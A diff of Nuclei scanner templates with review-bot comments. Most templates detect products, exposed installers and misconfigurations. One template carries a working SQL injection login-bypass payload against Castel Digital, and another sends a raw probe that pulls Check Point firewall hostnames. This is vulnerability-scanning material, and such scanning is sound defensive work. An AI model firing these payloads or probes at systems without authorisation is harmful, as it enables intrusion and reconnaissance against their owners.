- https://uptime.kuma.pet/docs/
- https://github.com/louislam/uptime-kuma/wiki
metadata:
max-request: 1
shodan-query: title:"Uptime Kuma"
verified: true
tags: uptime,kuma,panel,login
tags: uptime,kuma,panel,login,detect
http:
- method: GET
@ -29,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100a76857034836e1a9ae14af5352e203fb414f9b8cdb6e26e5cec35bb904d9afb002202568b0be6be509bd7442b6649aecbb7cb453c5e7d7f9726d7b81b4e60baefc8b:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ebe940aa6e53fd44bcd7be03b75902f7ce7cb1bfe215dd4723f649ff99e1d778022042ca248ccf5749cc7c89884b88353eff6869ea026ddeec90a7c4d51464b5287c:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,31 @@
id: tpot-honeypot-detect
info:
name: T-Pot Honeypot - Detect
author: rxerium
severity: info
description: |
A tpot dashboard has been detected
reference:
- https://github.com/telekom-security/tpotce
tags: tpot,honeypot
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>T-Pot</title>"
- "T-Pot @ Github"
- "T-Pot ReadMe"
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210092e8c105082a6686c4a5241f7fe90b7fe5f5f14e5e65ee874e138dd69c1462b3022100d38690efa1cc7e6e88c421640d5647ef94b715ac36a843d633116ae915c69d6e:922c64590222798bb761d5b6d8e72950


@ -11,7 +11,7 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: go,gocd,config,exposure,misconfig
http:
@ -31,4 +31,4 @@ http:
- "webhookSecret"
- "tokenGenerationKey"
condition: and
# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950


@ -11,7 +11,7 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: go,gocd,exposure,misconfig
http:
@ -38,4 +38,4 @@ http:
- type: regex
regex:
- "([a-z0-9]){32}"
# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950


@ -7,7 +7,7 @@ info:
description: GoCd Dashboard is exposed.
metadata:
max-request: 1
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: go,gocd,unauth,misconfig
http:
@ -29,4 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950


@ -2,7 +2,7 @@ id: https-to-http-redirect
info:
name: HTTPS to HTTP redirect Misconfiguration
author: kazet
author: kazet,idealphase
severity: info
description: |
Detects whether there is a redirect from https:// to http://
@ -16,11 +16,19 @@ http:
path:
- "{{BaseURL}}"
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'startswith(tolower(location), "http://")'
- 'startswith(tostring(BaseURL), "https://")'
- '(status_code == 301 || status_code == 302 || status_code == 307)'
- '(status_code == 300 || status_code == 301 || status_code == 302 || status_code == 303 || status_code == 307 || status_code == 308)'
condition: and
# digest: 4a0a0047304502206212deffff885bc2abd110b7921124764815e61844a28cf278f271f6d9753151022100861fee57cff6e033d3b77a48aa8a88595f5d7ea267d502b1aadf739e417f6608:922c64590222798bb761d5b6d8e72950
- type: dsl
dsl:
- 'startswith(tostring(BaseURL), "https://")'
- 'status_code == 200'
- 'contains(tolower(body), "<meta http-equiv=\"refresh\" content=\"0; url=http://")'
condition: and
# digest: 4a0a0047304502202c406d624823af9ef6ae82678b8dfe498a4da9ca22667ad1fb02f10ac0f23842022100afad097672382230a4c19ddf9d918cf336c624af3d33cc1fe279c3fdf43a1a98:922c64590222798bb761d5b6d8e72950
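Review bot: The new second matcher's `contains(tolower(body), "<meta http-equiv=\"refresh\" content=\"0; url=http://")` fires on one exact spelling of the tag only, so a meta-refresh downgrade written with single quotes, a non-zero delay, no space after the semicolon or a different attribute order goes unreported. A case-insensitive pattern such as `(?i)<meta[^>]+http-equiv=["']?refresh["']?[^>]+url=\s*["']?http://` in a regex check would cover those variants while still requiring an `http://` target. The widened status list in the first matcher now includes 300, which is harmless only because `startswith(tolower(location), "http://")` is still required alongside it.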


@ -0,0 +1,32 @@
id: custom-xoops-installer
info:
name: XOOPS Custom - Installation
author: DhiyaneshDK
severity: high
description: |
Detects the presence of XOOPS Custom installation page.
reference:
- https://www.exploit-db.com/ghdb/1115
metadata:
verified: true
max-request: 1
fofa-query: title="XOOPS Custom Installation"
tags: misconfig,xoops,installer
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>XOOPS Custom Installation</title>"
- type: status
status:
- 200
# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,32 @@
id: froxlor-installer
info:
name: Froxlor Server Management - Installer
author: DhiyaneshDK
severity: high
description: |
Detects the Froxlor Server Management Panel installation page.
reference:
- https://www.exploit-db.com/ghdb/8397
metadata:
verified: true
max-request: 1
fofa-query: title="Froxlor Server Management Panel - Installation"
tags: misconfig,froxlor,installer
http:
- method: GET
path:
- "{{BaseURL}}/install/install.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Froxlor Server Management Panel - Installation"
- type: status
status:
- 200
# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,28 @@
id: moosocial-installer
info:
name: mooSocial Installation - Exposure
author: ritikchaddha
severity: high
metadata:
verified: true
max-request: 1
shodan-query: html:"mooSocial Installation"
tags: exposure,moosocial,misconfig,install
http:
- method: GET
path:
- "{{BaseURL}}/install"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Welcome to mooSocial Installation'
- type: status
status:
- 200
# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950
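Review bot: The `info` block has no `description`, unlike the other installer templates added in this commit, so a `high` finding is reported with nothing that tells the reader why an exposed installer matters. Add a line such as `description: mooSocial installation page is exposed.` and, ideally, a short `remediation` saying to remove or restrict the install path once setup is complete.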


@ -0,0 +1,32 @@
id: phpmyfaq-installer
info:
name: phpMyFAQ Installation - Exposure
author: ritikchaddha
severity: high
description: phpMyFAQ installation is exposed.
metadata:
verified: true
max-request: 1
fofa-query: "phpMyFAQ-setup"
tags: misconfig,phpmyfaq,install
http:
- method: GET
path:
- "{{BaseURL}}/setup/index.php"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>phpMyFAQ'
- 'Setup</title>'
condition: and
- type: word
part: header
words:
- 'phpmyfaq-setup'
# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950
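Review bot: With `matchers-condition: or` and no status matcher, the header word `phpmyfaq-setup` is enough on its own to raise a `high` finding, whatever the response code or body. If that string can also appear in the headers of a redirect or error response (not verifiable from the template alone), this yields false positives. Requiring a 200 together with either indicator would tighten it, for example by expressing both checks as one `dsl` matcher that includes `status_code == 200`.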


@ -8,7 +8,7 @@ info:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1373456171
tags: panel,exposure,setup,github,misconfig
tags: misconfig,installer,github,setup
http:
- method: GET
@ -27,5 +27,4 @@ http:
- type: status
status:
- 200
# digest: 490a00463044022054ec1cd746591f30334be3d3af156ab086f89a6120fb908f899320a462f7ac8e02204e63937eb2e1648bfb9cdc3f74cd58e4846ee18ad4d2db21b9e7db237578ec4e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950


@ -29,7 +29,7 @@ http:
- type: regex
part: location
regex:
- '([0-9]{1,3}[\.]){3}[0-9]{1,3}'
- '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$'
- type: dsl
dsl:
@ -44,6 +44,5 @@ http:
- type: regex
part: location
regex:
- '([0-9]{1,3}[\.]){3}[0-9]{1,3}'
# digest: 4a0a00473045022100be01acb985c09c3394bcce936ba1cc283802b1069e6fcc5f63196c772bd55f5a02207165d8ff2b202e511f03d2c75a241b2f933b85b3993f668651c3db8216243382:922c64590222798bb761d5b6d8e72950
- '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$'
# digest: 490a0046304402202ccecab303233a1e75a78c8d3912d25f4b57cea0f77bde7b02f472f4084515f602205c380911aaf6c5293902999ed0f4901d57b5451c7fe26b1f1d209e9fee407854:922c64590222798bb761d5b6d8e72950
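Review bot: The new pattern is anchored with `^` and `$` but is applied to `part: location`, and a Location header normally holds a full URL rather than a bare address, so the regex in both hunks would stop matching a redirect that points at a private address inside a URL. Restricting the match to RFC 1918 ranges is a sound cut in false positives; to keep it while still matching inside a URL, drop the anchors and use word boundaries: `'\b(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})\b'`. Both enclosing blocks start outside the hunks, so this assumes `location` carries the raw header value.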


@ -1,45 +1,45 @@
id: ms-exchange-local-domain
info:
name: Microsoft Exchange Autodiscover - Local Domain Exposure
author: userdehghani
severity: low
description: |
Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint.
impact: |
An attacker can leverage this information for reconnaissance and targeted attacks.
remediation: |
Restrict access to the Autodiscover service or configure it to not expose local domain information.
reference:
- https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
shodan-query: http.title:outlook exchange
tags: misconfig, microsoft,ms-exchange,ad,dc
http:
- method: GET
path:
- "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "(?i)(X-Calculatedbetarget:)"
- type: status
status:
- 200
- 302
extractors:
- type: kval
kval:
- x_calculatedbetarget
# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950
id: ms-exchange-local-domain
info:
name: Microsoft Exchange Autodiscover - Local Domain Exposure
author: userdehghani
severity: info
description: |
Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint.
impact: |
An attacker can leverage this information for reconnaissance and targeted attacks.
remediation: |
Restrict access to the Autodiscover service or configure it to not expose local domain information.
reference:
- https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
shodan-query: http.title:outlook exchange
tags: misconfig, microsoft,ms-exchange,ad,dc
http:
- method: GET
path:
- "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "(?i)(X-Calculatedbetarget:)"
- type: status
status:
- 200
- 302
extractors:
- type: kval
kval:
- x_calculatedbetarget
# digest: 4a0a0047304502210097f4e7ab5764e0db53da23c04266b429b571322e42b0fad09912690d7b6b6fdd02202724f2e0e85ee16b159f4fea95e7e21447c003fae169973816932c90f362a2c0:922c64590222798bb761d5b6d8e72950
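Review bot: `severity` drops to `info`, but `classification.cvss-metrics` is still `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N`, a vector with a confidentiality impact that scores in the low range, so the two fields now disagree. Either keep `severity: low` or adjust or remove the vector, so that triage tooling reading one field or the other reaches the same answer. Separately, `tags: misconfig, microsoft,...` has a space after the first comma; `tags: misconfig,microsoft,ms-exchange,ad,dc` matches the style of the other templates.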


@ -10,7 +10,7 @@ info:
shodan-query: title:"TitanNit Web Control"
tags: misconfig,titannit,webcontrol,exposure
requests:
http:
- method: GET
path:
- "{{BaseURL}}"
@ -27,4 +27,4 @@ requests:
- type: status
status:
- 200
# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022077208e0ba5999cbde1529675b00c4aef08f25d22e17a7e32c879f55fc08d959d022009302237c4976cf4ac3b3178a0e47031e8775526bf381a67ce375519524ac681:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,36 @@
id: unigui-server-monitor-exposure
info:
name: UniGUI Server Monitor Panel - Exposure
author: serrapa
severity: low
description: |
Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data.
reference:
- https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm
metadata:
verified: true
max-request: 1
shodan-query: title:"uniGUI"
fofa-query: title="uniGUI"
tags: exposure,unigui,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/server"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_any(body, "uniGUI Standalone Server", "uniGUI License Information", "Server Statistics")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")'
- 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")'
condition: or
# digest: 490a0046304402205766cced7933a5f2f8ba6e4cd966dad51910774c86ee9260bb819ad300d147570220621881cf5155550a9207b7e19241b39c6a0df15d8629dac7675d024c80d6f14c:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,45 @@
id: apache-answer-detect
info:
name: Apache Answer - Detection
author: omranisecurity
severity: info
description: |
Detects Apache Answer version through API endpoit
reference:
- https://answer.apache.org/
metadata:
shodan-query: http.favicon.hash:523757057
fofa-query: icon_hash="523757057"
verified: true
max-request: 1
tags: detect,tech,apache
http:
- method: GET
path:
- "{{BaseURL}}/answer/api/v1/siteinfo"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"code":'
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: version
regex:
- '"version":"([^"]+)"'
# digest: 4b0a00483046022100e8b6cf0b4a146a98e2ea5be56454a84686c4de20f506b9c297c3b34b02905d930221008eb6c97ad0a6509d1e883e58004163afbfe3453aa32e30608e988f5e8df25d2a:922c64590222798bb761d5b6d8e72950
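Review bot: The body matcher looks only for `"code":`, which almost any JSON API returns, so a 200 JSON response at this path from an unrelated application would be reported as Apache Answer. The extractor already depends on `"version":"…"`, so requiring it in the matcher costs nothing: add `- '"version":'` to that matcher's `words` with `condition: and`. The description also has a typo, `endpoit` for `endpoint`.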


@ -0,0 +1,38 @@
id: boa-web-server
info:
name: Boa Web Server - Detect
author: johnk3r
severity: info
description: |
Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections.
reference:
- https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/
- http://www.boa.org/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
shodan-query: "Server: Boa/"
verified: true
max-request: 1
tags: boa,tech
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "Server: Boa/"
extractors:
- type: kval
part: header
kval:
- Server
# digest: 4a0a0047304502202169ec1f1b72425327554db7f1a270b4560a3e56b3f12e0cde1f693f8031958702210083f4edf96fefff0f4aaa15cc8b8070c70f6d8fe222ecb2b68da0734125597713:922c64590222798bb761d5b6d8e72950
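Review bot: The extractor asks for `kval: Server`, while the other kval extractors in this commit use lowercase, underscore-separated keys (`server`, `x_calculatedbetarget`); if keys are looked up case-sensitively, as that convention suggests, nothing is extracted here. Use `- server`. `matchers-condition: and` with a single matcher is redundant, and the `classification` block with an all-`N` impact vector and `cwe-id: CWE-200` adds nothing to a technology-detection template.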


@ -0,0 +1,36 @@
id: craftercms-detect
info:
name: CrafterCMS - Detect
author: righettod
severity: info
description: |
CrafterCMS was detected.
reference:
- https://craftercms.org/
metadata:
max-request: 1
verified: true
shodan-query: http.title:"craftercms"
tags: tech,craftercms,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'CrafterCMS'
extractors:
- type: regex
part: body
group: 1
regex:
- 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter'
# digest: 4a0a00473045022100aa4f31503bb26790a17d6e8f9f02499ec52e767847cf7d75e8df780d7d4d211902202c89f6902d7c1b9362db5edc7ee975d910d5c3d99f0911ff0e6d27ba4a57e9cc:922c64590222798bb761d5b6d8e72950


@ -2,7 +2,7 @@ id: favicon-detect
info:
name: favicon-detection
author: un-fmunozs,DhiyaneshDk
author: un-fmunozs,DhiyaneshDk,idealphase
severity: info
reference:
- https://twitter.com/brsn76945860/status/1171233054951501824
@ -3731,8 +3731,28 @@ http:
dsl:
- "status_code==200 && (\"-1599943282\" == mmh3(base64_py(body)))"
- type: dsl
name: "Veeam Service Provider Console"
dsl:
- "status_code==200 && (\"-1728967963\" == mmh3(base64_py(body)))"
- type: dsl
name: "mooSocial"
dsl:
- "status_code==200 && (\"702863115\" == mmh3(base64_py(body)))"
- type: dsl
name: "n8n"
dsl:
- "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))"
- type: dsl
name: "umami"
dsl:
- "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))"
extractors:
- type: dsl
dsl:
- 'mmh3(base64_py(body))'
# digest: 4a0a00473045022100d5db6ca1e3fae692c3d73e04bb2b8f32fbb0ce71e9dbe0e5e2568124a785b0b902202a8410c129ccda07db2f0cff823f28efc91b909fe40a147716b71e8f016a177e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100afa60b596fe20299d482f935df87359f0c8fb824c709cb56ef1f08634909a2000220316c27df890a1e6cb71ae4fe147ccd2465493542520ed705054c5a8df06cc1ac:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,28 @@
id: imgproxy-detect
info:
name: Imgproxy Detect
author: userdehghani
severity: info
description: |
imgproxy is a fast and secure standalone server for resizing, processing, and converting images.
reference:
- https://imgproxy.net/
metadata:
verified: true
max-request: 1
shodan-query: html:"imgproxy"
tags: imgproxy,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(server, "imgproxy")'
condition: and
# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,29 @@
id: statamic-detect
info:
name: Statamic - Detect
author: geeknik
severity: info
description: |
Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites.
reference:
- https://github.com/statamic/cms
metadata:
verified: true
max-request: 1
shodan-query: "Statamic"
tags: tech,statamic,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: regex
part: header
regex:
- 'X-Powered-By:(.*)Statamic'
# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,33 @@
id: tinyproxy-detect
info:
name: Tinyproxy - Detect
author: bhutch
severity: info
description: |
Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems
reference:
- https://github.com/tinyproxy/tinyproxy
metadata:
verified: true
max-request: 1
shodan-query: "Server: tinyproxy"
tags: tech,proxy,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "server: tinyproxy"
case-insensitive: true
extractors:
- type: kval
kval:
- server
# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,51 @@
id: uni-gui-framework
info:
name: UniGUI Framework - Detect
author: serrapa
severity: info
description: |
Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version.
metadata:
verified: true
max-request: 1
shodan-query: http.title:"UniGUI"
tags: tech,unigui
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uni-xtheme-"
- "ext-all.js"
- "uniVars._extVer="
condition: or
- type: regex
part: body
regex:
- 'uni-(\d+\.\d+\.\d+\.\d+)/'
- 'uniVars._extVer="(\d+\.\d+\.\d+)"'
extractors:
- type: regex
part: body
name: uni_gui_version
regex:
- 'uni-(\d+\.\d+\.\d+\.\d+)'
- type: regex
part: body
name: ext_js_version
regex:
- 'uniVars._extVer="(\d+\.\d+\.\d+)"'
# digest: 490a0046304402206a748c936bf19bbd442ca7a03f7e7b4d7947a2a385b1b49e7f308d20a043cf5f022016ae7660962c0a4e9421084b61ff85f7490145cb44206622d7a369d80751e1ef:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,37 @@
id: wp-bricks-builder-theme
info:
name: WordPress Bricks Builder Theme Version
author: Anonymous
severity: info
description: |
- Checks for Bricks Builder Theme versions.
reference:
- https://0day.today/exploit/description/39489
metadata:
publicwww-query: "/wp-content/themes/bricks/"
verified: true
max-request: 1
tags: wordpress,theme,wp-theme,wp,bricks
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/bricks/readme.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Bricks - Visual Website Builder"
- type: regex
part: body
regex:
- "Stable tag:([ 0-9.]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100c4459c83f851208e488f0f5bbeba4f40f1c2b14a227b689dba16c4c452d198b702206c63a5349ee0a6a1c5ba1f9065886fc44766c900aa9058cdda45ad713aa87241:922c64590222798bb761d5b6d8e72950
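Review bot: The description says the template checks Bricks theme versions, but there is no `extractors` block, so the `Stable tag:` value the regex matcher tests for is never reported and a finding cannot be compared against a fixed release. Add an extractor that reuses the matcher's pattern, as sketched below. The description's leading `- ` also renders as a list item inside the block scalar and can be dropped.

```yaml
# … unchanged: info block, request path and the three matchers …
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "Stable tag:([ 0-9.]+)"
```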


@ -0,0 +1,43 @@
id: castel-digital-sqli
info:
name: Castel Digital - Authentication Bypass
author: Kazgangap
severity: high
description: |
SQL Injection vulnerability in Castel Digital login forms.
reference:
- https://www.casteldigital.com.br/
- https://cxsecurity.com/issue/WLB-2024050032
metadata:
verified: true
max-request: 2
google-query: "Castel Digital"
tags: sqli,auth-bypass,castel
http:
- raw:
- |
POST /restrito/login/sub/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
- |
GET /restrito/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "Banner"
- "Construtoras"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d80a22d4cf273f6271529eb7a45f6340388cc7b72da5125e620e24e141c66ac4022100dab34630a0cb5708cd7153359df8c7bbe5b45c9c7ee7cb0f076e31a29b76023d:922c64590222798bb761d5b6d8e72950
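Review bot: The verdict rests on the generic words `Banner` and `Construtoras` in `body_2` plus an unqualified `status: 200`, which does not show that the first request changed the session state. If `/restrito/` is publicly readable on a target, or serves a 200 page containing those words, a `high` SQL injection finding is reported where none exists. Tighten it with a marker that only the authenticated area contains and a negative check for the login form, and tie the status check to the second response, e.g. `status_code_2 == 200` in a `dsl` matcher.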


@ -11,7 +11,7 @@ info:
- https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml
metadata:
max-request: 1
shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337
shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337
tags: kiwitcms,exposure,misconfig,hackerone
http:
@ -44,4 +44,4 @@ http:
part: body
json:
- .result[].username
# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,38 @@
id: checkpoint-firewall-enum
info:
name: Check Point Firewall - Detect
author: pussycat0x
severity: info
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_hostname.rb
metadata:
verfied: true
shodan-query: product:"Check Point Firewall"
tags: js,network,firewall,checkpoint,enum
javascript:
- code: |
let packet = bytes.NewBuffer();
let prob = "\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00"
data = packet.Write(prob)
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let resp = conn.RecvFullString();
let regex = /CN=(.+),O=(.+?)\./i;
let match = resp.match(regex);
let fw_hostname = match[1];
let sc_hostname = match[2];
let result = (`Firewall Host: ${fw_hostname}, SmartCenter Host: ${sc_hostname}`);
result
args:
Host: "{{Host}}"
Port: 264
extractors:
- type: dsl
dsl:
- response
# digest: 4b0a00483046022100ee7f1b386f2f382432b2846abb2832434819f68e200c9e7063099dead504f141022100f85c2860578d5e28ebc3fc651d9928447b42bcd28b5d510c7cf40223f8d5fd8e:922c64590222798bb761d5b6d8e72950
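Review bot: `match[1]` is read without checking that `resp.match(regex)` succeeded, so any service on port 264 that does not answer with a `CN=…,O=…` string makes the script throw rather than finish with no result. Check `match` for null before indexing and produce the result string only when both groups are present. The metadata key is misspelled, `verfied: true` should be `verified: true`, and `data` is assigned without `let`. The connection is also never closed after `RecvFullString()`.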


@ -6,24 +6,20 @@ info:
severity: info
description: |
T3 is the protocol used to transport information between WebLogic servers and other types of Java programs.
impact: |
May indicate potential exposure to Weblogic T3 Protocol vulnerabilities
remediation: |
Ensure proper configuration and security measures are in place for Weblogic T3 Protocol
metadata:
max-request: 2
tags: network,weblogic,detect,t3,oracle
tcp:
- inputs:
- data: "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
\n"
- data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
host:
- "{{Hostname}}"
port: 7001
read-size: 1024
matchers:
- type: word
@ -38,20 +34,11 @@ tcp:
- "HELO:(.*).false"
- inputs:
- data: "t3s 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
\n"
